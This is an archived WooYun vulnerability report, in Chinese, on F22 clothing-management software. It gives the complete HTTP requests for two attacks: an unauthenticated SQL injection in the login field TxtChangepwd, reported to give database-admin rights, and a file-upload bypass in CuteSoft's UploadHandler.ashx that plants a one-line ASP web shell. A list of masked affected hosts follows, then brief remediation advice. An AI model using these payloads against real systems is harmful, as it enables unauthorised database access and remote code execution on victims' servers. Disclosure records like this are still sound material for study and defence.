乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-18: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向第三方安全合作伙伴开放 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
rt
F22服装管理软件一处注入,无需登录DBA权限
POST / HTTP/1.1Host: **.**.**.**:8888Content-Length: 694Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**:8888User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**:8888/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8__VIEWSTATE=%2FwEPDwUKLTU3MzU4MDE3Mw9kFgICAw9kFggCAQ8QZA8WAWYWARAFDOiHquWKqOivhuWIqwUM6Ieq5Yqo6K%2BG5YirZ2RkAgMPD2QWAh4Jb25rZXlkb3duBSByZXR1cm4ganVtcE5leHQuY2FsbCh0aGlzLGV2ZW50KWQCBQ8PZBYCHwAFIHJldHVybiBqdW1wTmV4dC5jYWxsKHRoaXMsZXZlbnQpZAIHDw9kFgIfAAUgcmV0dXJuIGp1bXBOZXh0LmNhbGwodGhpcyxldmVudClkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQRidG9r6WptDiQ9vTtaZjd4ZBA27uBZCx6p87oJHjFH%2Bx5fNw4%3D&__VIEWSTATEGENERATOR=999D6048&__EVENTVALIDATION=%2FwEWBwKqporlCQKT1cKmBAK0ysq%2BAgKm5IyfBwKg1t%2FLAQKti6zYCwKT%2Bp7DBwT6LFeQC9UjEiRuKZAEw6JtUHGK8lEZhG8XHZbtjTkq&DDList=%E8%87%AA%E5%8A%A8%E8%AF%86%E5%88%AB&TxtChangepwd=123456&tbuser=123456&tbpwd=123456&btok.x=40&btok.y=17&ServerDate=2015-09-06
登录框里面的参数TxtChangepwd存在注入(如下案例里每个系统跑注入时需重新抓包)一处无限制GETSHELL,无需登录
/cutesoft_client/uploadfile.aspx
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1Host: **.**.**.**:8888Content-Length: 664Origin: http://**.**.**.**:8888X-Requested-With: ShockwaveFlash/**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36Content-Type: multipart/form-data; boundary=----------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6Accept: */*Referer: http://**.**.**.**:8888/cutesoft_client/uploadfile.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6Content-Disposition: form-data; name="Filename"1.asp.jgp------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6Content-Disposition: form-data; name="fileext"*.jpg;*.gif;*.png;*.jpeg------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6Content-Disposition: form-data; name="folder"/oa/file/news------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6Content-Disposition: form-data; name="Filedata"; filename="1.asp"Content-Type: application/octet-stream<%eval request("pass")%>------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6Content-Disposition: form-data; name="Upload"Submit Query------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6--
案例:
**.**.**.**:8000/**.**.**.**:8888/**.**.**.**:8080/**.**.**.**:8888/**.**.**.**/http://**.**.**.**/**.**.**.**/**.**.**.**/http://**.**.**.**:8088/**.**.**.**/**.**.**.**:8080/**.**.**.**:8888/http://**.**.**.**/**.**.**.**:81/**.**.**.**:81/**.**.**.**/**.**.**.**:8000/**.**.**.**/**.**.**.**:8888/http://**.**.**.**/**.**.**.**:8000/**.**.**.**/http://**.**.**.**:8081/**.**.**.**:81/http://**.**.**.**/**.**.**.**:81/**.**.**.**/**.**.**.**:8888/**.**.**.**:8081/**.**.**.**:8086/**.**.**.**:8081/**.**.**.**:8081/http://**.**.**.**:8081/**.**.**.**:8081/http://**.**.**.**:8088/**.**.**.**:8888/**.**.**.**:8088/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8081/**.**.**.**:8080/**.**.**.**:88/**.**.**.**:88/**.**.**.**:81/**.**.**.**:81/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/http://**.**.**.**:8888/http://**.**.**.**:88/**.**.**.**:8081/http://**.**.**.**:88/
sql过滤提交的参数getshel问题,添加权限限制访问
危害等级:高
漏洞Rank:18
确认时间:2015-09-18 13:58
暂未建立与软件生产厂商的直接处置渠道,待认领.
暂无